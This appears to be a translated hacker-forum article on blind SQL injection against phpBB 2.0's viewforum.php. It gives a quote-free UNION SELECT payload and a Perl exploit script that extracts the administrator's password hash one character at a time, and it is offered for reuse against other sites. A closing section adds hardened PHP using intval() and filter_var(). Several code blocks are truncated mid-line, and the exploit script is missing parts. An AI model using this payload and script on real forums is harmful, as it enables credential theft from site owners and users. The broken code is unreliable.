It is hard to find a complete article on PHP injection that comes with usable code, so over the past few weeks I have gone back over MySQL and PHP. Let me share what I found; consider it a brick thrown out in the hope of attracting jade!
I believe everyone is already very familiar with injection in ASP. Injection in PHP is harder than in ASP, because PHP's magic_quotes_gpc option is a real headache: quotes cannot be used in the injection. Also, PHP is mostly paired with MySQL, and the limitations of MySQL's functions, looked at from another angle, do prevent SQL injection attacks to a certain extent. I will give an example here, taking phpBB 2.0 as the target:
There is a variable in viewforum.php that is not filtered:
```php
if (isset($HTTP_GET_VARS
{
    $forum_id = (isset($HTTP_GET_VARS  ($HTTP_POST_VARS
```

If this were ASP, I believe many people would inject right here. If the forum specified by this forum_id does not exist, $result will be empty, so the page returns "Could not obtain forums information" and the code below is never executed:

```php
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id);
/******************************************/
```

The key is the line above the row of stars: session_pagestart($user_ip, $thispage_id) is a function defined in session.php. Its code is too long to post in full; those who are interested can read it. The key point is that this function in turn calls session_begin(); the call is session_begin($user_id, $user_ip, $thispage_id, TRUE), also defined in the same file, and it contains the following code:

```php
$sql = "UPDATE " . SESSIONS_TABLE . "
    SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id, session_logged_in = $login
    WHERE session_id = '" . $session_id . "'
        AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) || !$db->sql_affectedrows() )
{
    $session_id = md5(uniqid($user_ip));

    $sql = "INSERT INTO " . SESSIONS_TABLE . "
        (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in)
        VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__, $sql);
    }
}
```

Here session_page is a column defined in MySQL, and its value is $page_id, that is, $forum_id. If what gets inserted is not an integer, the query fails and the prompt "Error creating new session : session_begin" appears. So the $forum_id I pass in matters a great deal; I set it to:

    -1%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20phpbb_users%20WHERE%20user_id=2%20AND%20ORD(SUBSTRING(user_password,1,1))=57

There are no quotes in it! Although a non-existent forum_id is specified, the query result it returns is not empty, provided that the ASCII value of the first character of the password of the user with user_id 2 is 57. If the first character is guessed correctly, $result is not empty, so execution reaches session_pagestart; there the non-integer value makes the INSERT fail, and "Error creating new session : session_begin" is displayed, which tells you the first character was guessed right. The other positions work the same way. Without this error message, even a successful guess would be hard to recognise; it seems the error message is very helpful indeed. That is the end of the analysis. Attached below is a test script; with slight changes to the code it can be applied to other similar MD5 password guessing. I use the return condition of the English version; for Chinese and other language versions, just change the return condition.
```perl
use LWP::UserAgent;
$ua = new LWP::UserAgent;
print "***********************************\n";
print "phpbb viewforum.php exp\n";
print "Code by PinKeyes\n";
print "www.icehack.com\n";
print "***********************************\n";
print "please enter the weak file's url:\n";
print "eg http://192.168.1.4/phpbb2/viewforum.php\n";
$adj =
20user_id=$u%20and%20ORD(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);
if ($response->is_success) {
    if ($response->content =~ /Error creating new session/) {
        $pwd .= chr($pink[$i]);
        print "$pwd\n";
    }
}
}}}}
if ($pwd ne "") {
    print "successfully, the password is $pwd, good luck\n";
} else {
    print "bad luck, work failed!\n";
}
```

As for exploiting the recent phpBB 2.0.6 search.php problem, the code above only needs slight modification. If you have corrections, please post them at www.icehack.com.
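The root cause above is that $forum_id is interpolated into the query exactly as received. The following is an added example (my own code, not phpBB's) showing the unfiltered lookup beside two hardened forms; it works on a plain $_GET-style array, and the table name and the 'f' parameter are assumed.

```php
<?php
// Added example, not phpBB's code. Demonstrates the forum_id bug from the
// text and two ways of closing it. Table/parameter names are assumed.

// Vulnerable form: the raw request value is dropped into the query.
// magic_quotes_gpc does not help here, because the payload needs no quotes.
function forum_sql_unsafe(array $get): string
{
    $forum_id = $get['f'];
    return "SELECT f.* FROM phpbb_forums f WHERE f.forum_id = $forum_id";
}

// Hardened form 1: coerce to an integer before interpolation. intval()
// keeps only the leading number, so "-1 UNION SELECT ..." becomes -1 and
// the query can only return rows for a genuine forum id (or none at all,
// which ends in the 'Forum_not_exist' message instead of session_pagestart).
function forum_sql_intval(array $get): string
{
    $forum_id = intval($get['f']);
    return "SELECT f.* FROM phpbb_forums f WHERE f.forum_id = $forum_id";
}

// Hardened form 2: validate strictly and refuse anything that is not a
// positive integer, so a tampered request gets one fixed response and the
// value never reaches the query at all. Returns null on rejection.
function forum_id_or_null(array $get): ?int
{
    if (!isset($get['f'])) {
        return null;
    }
    $id = filter_var($get['f'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed request carrying the payload shape described in the text.
$payload = '-1 UNION SELECT 1,1,1 FROM phpbb_users WHERE user_id=2 AND ORD(SUBSTRING(user_password,1,1))=57';
$get = ['f' => $payload];

echo forum_sql_unsafe($get), "\n";        // the attacker's SELECT reaches MySQL
echo forum_sql_intval($get), "\n";        // ... WHERE f.forum_id = -1
var_dump(forum_id_or_null($get));         // NULL: request rejected outright
var_dump(forum_id_or_null(['f' => '7'])); // int(7): normal request passes
```

The same intval()/filter_var() treatment applies to every numeric parameter that ends up in a query, because quote-escaping (magic_quotes_gpc or addslashes) only protects string contexts.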

